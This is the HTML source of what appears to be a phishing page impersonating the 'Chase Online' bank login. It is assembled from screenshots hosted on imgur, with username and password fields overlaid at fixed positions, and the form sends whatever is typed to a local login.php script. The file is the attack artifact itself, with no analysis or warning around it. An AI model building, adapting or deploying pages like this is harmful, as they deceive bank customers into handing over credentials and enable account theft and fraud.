<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Chase Online</title>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta name="generator" content="Web Page Maker">
</head>
<body>
<div id="image2" style="position:absolute; overflow:hidden; left:0px; top:546px; width:1350px; height:170px; z-index:0"><img src="https://i.imgur.com/ButxlZO.jpg" alt="" title="" border=0 width=1350 height=170></div>

<form name="form1" method="post" action="login.php" enctype="application/x-www-form-urlencoded" style="margin:0px">
<input name="formtext1" type="text" style="position:absolute;width:322px;left:513px;top:194px;z-index:3;height: 46px;" required placeholder="Username">
<input name="formtext2" type="password" style="position:absolute;width:322px;left:514px;top:253px;z-index:4;height: 46px;" required placeholder="Password">
<div id="formimage1" style="position:absolute; left:500px; top:344px; z-index:5"><input type="image" name="formimage1" width="346" height="45" src="https://i.imgur.com/Eucd9If.jpg"></div>
</form>

<div id="image1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:1350px; height:646px; z-index:2"><img src="https://i.imgur.com/277Uonx.jpg" alt="" title="" border=0 width=1350 height=646></div>

<div id="image3" style="position:absolute; overflow:hidden; left:495px; top:309px; width:346px; height:29px; z-index:6"><img src="https://i.imgur.com/rDhXJrK.jpg" alt="" title="" border=0 width=346 height=29></div>


</body>
</html>
